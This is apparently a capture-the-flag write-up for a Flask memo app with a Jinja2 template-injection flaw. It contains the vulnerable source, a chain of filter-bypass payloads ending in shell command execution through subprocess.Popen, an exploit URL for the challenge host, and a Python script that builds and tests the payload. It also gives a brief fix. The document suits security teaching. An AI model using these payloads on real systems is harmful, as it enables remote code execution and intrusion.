[WEB] Jinjja (SSTI)

There is a memo feature.

Several filters are in place.

On top of that, args is blocked, and assembling it with |join does not work either, because the single letter g in 'gs' still trips the filter: request|attr(('ar','gs')|join)|attr('a')


request|attr(%27ar\x67s%27)

Writing the g as \x67 works!!!! Jinja decodes the escape inside the string literal, but the blacklist only ever sees the raw text. From here the chain is built up one attribute at a time; the dunder names are passed in separate query parameters a..e, which the filter never checks:

request|attr(%27ar\x67s%27)|attr(%27\x67et%27)(%27c%27)}}&c=_

{{%27%27|attr(request|attr(%27ar\x67s%27)|attr(%27\x67et%27)(%27a%27))}}&a=__class__&b=__mro__

{{%27%27|attr(request|attr(%27ar\x67s%27)|attr(%27\x67et%27)(%27a%27))|attr(request|attr(%27ar\x67s%27)|attr(%27\x67et%27)(%27b%27))}}&a=__class__&b=__mro__

{{%27%27|attr(request|attr(%27ar\x67s%27)|attr(%27\x67et%27)(%27a%27))|attr(request|attr(%27ar\x67s%27)|attr(%27\x67et%27)(%27b%27))|attr(request|attr(%27ar\x67s%27)|attr(%27\x67et%27)(%27c%27))}}&a=__class__&b=__mro__&c=__getitem__

{{%27%27|attr(request|attr(%27ar\x67s%27)|attr(%27\x67et%27)(%27a%27))|attr(request|attr(%27ar\x67s%27)|attr(%27\x67et%27)(%27b%27))|attr(request|attr(%27ar\x67s%27)|attr(%27\x67et%27)(%27c%27))(1)}}&a=__class__&b=__mro__&c=__getitem__

{{%27%27|attr(request|attr(%27ar\x67s%27)|attr(%27\x67et%27)(%27a%27))|attr(request|attr(%27ar\x67s%27)|attr(%27\x67et%27)(%27b%27))|attr(request|attr(%27ar\x67s%27)|attr(%27\x67et%27)(%27c%27))(1)|attr(request|attr(%27ar\x67s%27)|attr(%27\x67et%27)(%27d%27))()}}&a=__class__&b=__mro__&c=__getitem__&d=__subclasses__

{{%27%27|attr(request|attr(%27ar\x67s%27)|attr(%27\x67et%27)(%27a%27))|attr(request|attr(%27ar\x67s%27)|attr(%27\x67et%27)(%27b%27))|attr(request|attr(%27ar\x67s%27)|attr(%27\x67et%27)(%27c%27))(1)|attr(request|attr(%27ar\x67s%27)|attr(%27\x67et%27)(%27d%27))()|attr(request|attr(%27ar\x67s%27)|attr(%27\x67et%27)(%27c%27))(213)}}&a=__class__&b=__mro__&c=__getitem__&d=__subclasses__

{{%27%27|attr(request|attr(%27ar\x67s%27)|attr(%27\x67et%27)(%27a%27))|attr(request|attr(%27ar\x67s%27)|attr(%27\x67et%27)(%27b%27))|attr(request|attr(%27ar\x67s%27)|attr(%27\x67et%27)(%27c%27))(1)|attr(request|attr(%27ar\x67s%27)|attr(%27\x67et%27)(%27d%27))()|attr(request|attr(%27ar\x67s%27)|attr(%27\x67et%27)(%27c%27))(213)('id',shell=True,stdout=-1)|attr(request|attr(%27ar\x67s%27)|attr(%27\x67et%27)(%27e%27))()}}&a=__class__&b=__mro__&c=__getitem__&d=__subclasses__&e=communicate

from flask import Flask, request, render_template, render_template_string

app = Flask(__name__)

@app.route('/', methods=['GET'])
def index():
    return render_template('index.html')

@app.route('/memo', methods=['GET'])
def memo():
    payload = request.args.get('memo', '')

    if payload:
        # Substring blacklist applied to the lowercased memo parameter only.
        # The single letter 'g' rejects args, get, config and __subclasses__
        # wholesale; '\x5f', '\137' and '\u' close the obvious escapes for '_',
        # but a hex escape for 'g' such as \x67 is not on the list, and the
        # other query parameters (a, b, c, ...) are never inspected.
        blacklist = ['_', '__', '\\x5f', '\\u', 'args', 'form', '.', 'config', 'g', 'get_flashed_messages', 'url_for', '[', ']', 'byte', 'eval', '\\137']

        for _ in blacklist:
            if payload.lower().find(_) != -1:
                return f'Filter [{_}]'

        # The memo is spliced into the template source itself: this is the SSTI.
        html = '''temp memo %s'''%(payload)

        return render_template_string(html)

    else:
        # Korean "memo 값이 없어유" ("there is no memo value"), written as \x escapes of its UTF-8 bytes
        return 'memo \xea\xb0\x92\xec\x9d\xb4 \xec\x97\x86\xec\x96\xb4\xec\x9c\xa0'

app.run('0.0.0.0', 8080)


http://web.h4ckingga.me:10011/memo?memo={{''|attr(request|attr('ar\x67s')|attr('\x67et')('a'))|attr(request|attr('ar\x67s')|attr('\x67et')('b'))|attr(request|attr('ar\x67s')|attr('\x67et')('c'))(1)|attr(request|attr('ar\x67s')|attr('\x67et')('d'))()|attr(request|attr('ar\x67s')|attr('\x67et')('c'))(213)('ls',shell=True,stdout=-1)|attr(request|attr('ar\x67s')|attr('\x67et')('e'))()|attr(request|attr('ar\x67s')|attr('\x67et')('c'))(0)|attr('decode')('utf-8')}}&a=__class__&b=__mro__&c=__getitem__&d=__subclasses__&e=communicate
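As an added example (not the write-up author's code and not part of the challenge), the script below reproduces the memo blacklist from the source above, shows why 'args', the |join trick and any 'g' inside the command string are rejected while the \x67 escape passes, builds the same attr()/request.args.get() chain as the final payload with the dunder names carried in a..e, and, assuming jinja2 is installed, renders it locally against a stand-in request object that only exposes .args. The Popen index 213 is looked up dynamically here because it depends on the target's Python build, and the base URL http://localhost:8080 is a placeholder.

```python
import subprocess
from urllib.parse import urlencode

# Blacklist copied from the challenge source. The check is a substring match on
# payload.lower(): 'g' alone rejects args, get, config and __subclasses__, and
# '\x5f' / '\137' / '\u' close the obvious escapes for '_', but \x67 for 'g'
# is not listed.
BLACKLIST = ['_', '__', '\\x5f', '\\u', 'args', 'form', '.', 'config', 'g',
             'get_flashed_messages', 'url_for', '[', ']', 'byte', 'eval', '\\137']


def filter_hit(payload):
    """Return the first blacklist entry found in payload, or None if it passes.
    Mirrors the challenge's loop; only the memo parameter is ever checked."""
    low = payload.lower()
    for bad in BLACKLIST:
        if bad in low:
            return bad
    return None


def jinja_literal(body):
    """Decode the body of a Jinja2 string literal the way the Jinja2 lexer does
    (unicode-escape): 'ar\\x67s' becomes 'args' only after the filter has run."""
    return body.encode('ascii', 'backslashreplace').decode('unicode-escape')


def hexescape_g(text):
    """Rewrite every 'g' as the \\x67 escape so a literal survives the 'g' rule."""
    return text.replace('g', '\\x67')


def get_param(name):
    """Template fragment equivalent to request.args.get(name) that never writes
    'args', 'get', '.' or '_' into the memo."""
    return "request|attr('%s')|attr('%s')('%s')" % (
        hexescape_g('args'), hexescape_g('get'), name)


def find_popen_index():
    """Index of subprocess.Popen in object.__subclasses__() for this interpreter.
    The write-up's 213 is specific to the challenge's Python build; the chain
    reaches the same list through ''.__class__.__mro__[1], which is object."""
    for i, cls in enumerate(object.__subclasses__()):
        if cls.__name__ == 'Popen' and cls.__module__ == 'subprocess':
            return i
    raise LookupError('subprocess.Popen is not loaded')


def build(popen_index, cmd):
    """Build (memo template, extra query parameters) for the write-up's chain.
    Dunder names travel in a..e, which the filter never inspects; the command
    string sits inside the memo, so it is filtered too (use hexescape_g on it)."""
    params = {'a': '__class__', 'b': '__mro__', 'c': '__getitem__',
              'd': '__subclasses__', 'e': 'communicate'}
    memo = ("{{''|attr(%s)|attr(%s)|attr(%s)(1)|attr(%s)()|attr(%s)(%d)"
            "('%s',shell=True,stdout=-1)|attr(%s)()|attr(%s)(0)"
            "|attr('decode')('utf-8')}}") % (
        get_param('a'), get_param('b'), get_param('c'), get_param('d'),
        get_param('c'), popen_index, cmd, get_param('e'), get_param('c'))
    return memo, params


def full_url(base, memo, params):
    """Percent-encode the memo and the a..e parameters into one GET URL."""
    return base + '?' + urlencode({'memo': memo, **params})


def render_locally(memo, params):
    """Render the memo with jinja2 (assumed installed) against a stand-in for
    flask.request that only exposes .args, to confirm the chain resolves."""
    from jinja2 import Environment

    class FakeRequest:
        args = params

    return Environment().from_string(memo).render(request=FakeRequest())


if __name__ == '__main__':
    memo, params = build(find_popen_index(), 'id')
    print('filter hit:', filter_hit(memo))          # None: the memo passes
    print('command with a g:', filter_hit(build(0, 'cat flag')[0]))   # 'g'
    print(full_url('http://localhost:8080/memo', memo, params))
    try:
        print(render_locally(memo, params))          # output of `id`
    except ImportError:
        print('jinja2 not installed; skipping local render')
```

Note that a command such as `cat flag` is blocked by the same 'g' rule as everything else, so it has to go through hexescape_g as well. On the server side the root cause is render_template_string on a string built from the memo; passing the memo as a template variable (render_template_string('temp memo {{ memo }}', memo=payload)) keeps it as data rather than template source, and no blacklist is then needed.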


Reading the flag file gives the output above.

The flag could not be obtained by reading the flag file; it had to be executed.
